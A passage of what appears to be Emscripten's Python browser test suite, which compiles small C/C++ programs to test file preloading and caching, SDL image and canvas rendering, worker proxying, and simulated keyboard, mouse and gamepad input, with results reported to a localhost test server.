abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt'))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
run_process([PYTHON, FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
os.makedirs(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs('subdirr')
os.makedirs('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl_image.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl_image.c', '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.compile_btest([
'sdl_image_jpeg.c', '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates above test, but verifies we can run outside of the btest harness
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
create_test_file(to + '.html', html_mod(open('test.html').read().replace('test.js', to + '.js')))
create_test_file(to + '.js', js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def get_async_args(self):
if self.is_wasm_backend():
return ['-s', 'ASYNCIFY']
else:
return ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1'] + self.get_async_args()
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
create_test_file('sdl_key.c', self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
self.compile_btest(['sdl_key.c', '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl_text.c', self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
self.compile_btest(['sdl_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('test_glfw_joystick.c', self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
self.compile_btest(['test_glfw_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
